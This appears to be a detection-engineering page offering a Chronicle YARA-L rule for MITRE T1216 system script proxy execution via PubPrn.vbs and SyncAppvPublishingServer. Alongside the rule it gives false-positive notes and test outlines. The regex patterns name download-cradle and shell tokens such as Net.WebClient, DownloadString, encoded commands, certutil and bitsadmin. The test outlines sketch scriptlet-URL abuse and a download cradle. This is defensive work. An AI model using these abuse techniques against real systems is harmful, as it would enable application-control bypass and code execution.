T1216 Google Chronicle · YARA-L

Detect System Script Proxy Execution in Google Chronicle

Adversaries may use trusted scripts, often signed with Microsoft certificates, to proxy the execution of malicious files. Several Microsoft-signed scripts that ship with Windows or are downloadable from Microsoft can be abused to proxy execution of attacker-controlled content. Primary sub-techniques include PubPrn.vbs (a printer publishing script that accepts a 'script:' COM scriptlet URL as its second argument) and SyncAppvPublishingServer.vbs/exe (an App-V publishing script that passes arguments directly to a PowerShell pipeline). Because these scripts are signed by Microsoft, they may bypass application control policies (AppLocker, WDAC) that trust Microsoft-signed content, and they evade script-based detection that focuses on unsigned or unknown interpreters. The technique falls under Defense Evasion, making it a common component of initial access payloads and post-exploitation tooling.

MITRE ATT&CK

Tactic
Defense Evasion
Technique
T1216 System Script Proxy Execution
Canonical reference
https://attack.mitre.org/techniques/T1216/

YARA-L Detection Query

Google Chronicle (YARA-L)
yaral 
rule T1216_System_Script_Proxy_Execution {
  meta:
    author = "Argus Detection Engineering"
    description = "Detects T1216 System Script Proxy Execution via PubPrn.vbs and SyncAppvPublishingServer proxy scripts. Covers direct invocation with scriptlet protocol abuse, SyncAppvPublishingServer.exe PowerShell pipeline proxy, and suspicious child process spawning from proxy script hosts."
    mitre_attack_tactic = "Defense Evasion"
    mitre_attack_technique = "T1216"
    mitre_attack_subtechniques = "T1216.001, T1216.002"
    severity = "HIGH"
    confidence = "HIGH"
    created = "2026-04-13"
    platform = "Windows"

  events:
    $e.metadata.event_type = "PROCESS_LAUNCH"
    $e.metadata.vendor_name = "Microsoft"
    (
      (
        re.regex($e.target.process.file.full_path, `(?i)\\(cscript|wscript)\.exe$`)
        and (
          re.regex($e.target.process.command_line, `(?i)pubprn\.vbs`)
          or re.regex($e.target.process.command_line, `(?i)syncappvpublishingserver\.vbs`)
          or re.regex($e.target.process.command_line, `(?i)script:`)
          or re.regex($e.target.process.command_line, `(?i)scrobj\.dll`)
          or re.regex($e.target.process.command_line, `(?i)scriptlet`)
        )
      )
      or
      (
        re.regex($e.target.process.file.full_path, `(?i)\\syncappvpublishingserver\.exe$`)
        and re.regex($e.target.process.command_line, `(?i)(invoke-expression|\biex\b|net\.webclient|downloadstring|-encodedcommand|-enc\b|start-process|start-bitstransfer)`)
      )
      or
      (
        re.regex($e.principal.process.file.full_path, `(?i)\\(cscript|wscript)\.exe$`)
        and (
          re.regex($e.principal.process.command_line, `(?i)pubprn\.vbs`)
          or re.regex($e.principal.process.command_line, `(?i)syncappvpublishingserver\.vbs`)
        )
        and re.regex($e.target.process.file.full_path, `(?i)\\(powershell|pwsh|cmd|mshta|rundll32|regsvr32|certutil|msiexec|wmic|bitsadmin|curl|wget)\.exe$`)
      )
    )

  condition:
    $e
}
high severity high confidence

Chronicle YARA-L 2.0 rule detecting T1216 System Script Proxy Execution using UDM PROCESS_LAUNCH events. Three conditions are evaluated: (1) cscript/wscript executing proxy scripts with scriptlet protocol or scrobj.dll references, (2) SyncAppvPublishingServer.exe with PowerShell pipeline proxy arguments indicating the script is passing content to a PS pipeline, and (3) suspicious child processes (powershell, mshta, rundll32, etc.) spawned from cscript/wscript that previously loaded a proxy script. Uses principal.process for parent and target.process for spawned process in UDM model.

Data Sources

Google Chronicle with Windows Sysmon forwardingChronicle Unified Data Model (UDM) PROCESS_LAUNCH eventsWindows Event Forwarding (WEF) to Chronicle

Required Tables

UDM PROCESS_LAUNCH eventsChronicle entity graph for process lineage

False Positives & Tuning

  • Legitimate App-V application publishing during scheduled maintenance windows where SyncAppvPublishingServer.exe is invoked by SCCM without PS proxy arguments
  • IT administrator scripts that wrap PubPrn.vbs in automation pipelines for bulk printer provisioning — the scriptlet condition would not trigger for legitimate use
  • Security testing infrastructure running authorized T1216 atomic tests as part of continuous detection validation programs
Download portable Sigma rule (.yml)

Other platforms for T1216

Microsoft Sentinel (KQL) Splunk (SPL) Elastic Security (Elastic) IBM QRadar (QRadar) Sumo Logic CSE (Sumo) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1PubPrn.vbs Scriptlet Execution via script: Protocol

    Expected signal: Sysmon Event ID 1: Process Create with Image=cscript.exe, CommandLine containing 'pubprn.vbs' and 'script:http://127.0.0.1'. Sysmon Event ID 3: Network Connection attempt to 127.0.0.1:8080 from cscript.exe. Security Event ID 4688 if command line auditing is enabled.

  2. Test 2SyncAppvPublishingServer.vbs PowerShell Pipeline Injection

    Expected signal: Sysmon Event ID 1: cscript.exe with CommandLine containing 'SyncAppvPublishingServer.vbs' and 'Write-Output'. Child process Sysmon Event ID 1: powershell.exe spawned by cscript.exe executing the injected command. Sysmon Event ID 11: File Create for t1216-test.txt in %TEMP%.

  3. Test 3SyncAppvPublishingServer.exe Direct Invocation with PowerShell Download Cradle

    Expected signal: Sysmon Event ID 1: SyncAppvPublishingServer.exe with CommandLine containing 'Invoke-Expression' and 'Net.WebClient'. Sysmon Event ID 3: Network Connection attempt to 127.0.0.1:9090. Security Event ID 4688 with full command line.

  4. Test 4PubPrn.vbs Used from Non-Standard Location (Bypass Detection by Path)

    Expected signal: Sysmon Event ID 11: File Create for pubprn.vbs in %TEMP% (potential staging artifact). Sysmon Event ID 1: cscript.exe with CommandLine referencing %TEMP%\pubprn.vbs and the 'script:' URL. Sysmon Event ID 3: Network Connection attempt from cscript.exe.

Last updated: 2026-04-13 Research depth: deep
References (10)

Unlock Pro Content

Get the full detection package for T1216 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Sub-techniques (2)

Related Techniques

T1216.001PubPrnT1216.002SyncAppvPublishingServerT1218System Binary Proxy ExecutionT1218.005MshtaT1218.011Rundll32T1059.005Visual BasicT1059.001PowerShellT1105Ingress Tool TransferT1027Obfuscated Files or Information

Same Tactic: Defense Evasion

Popular Detections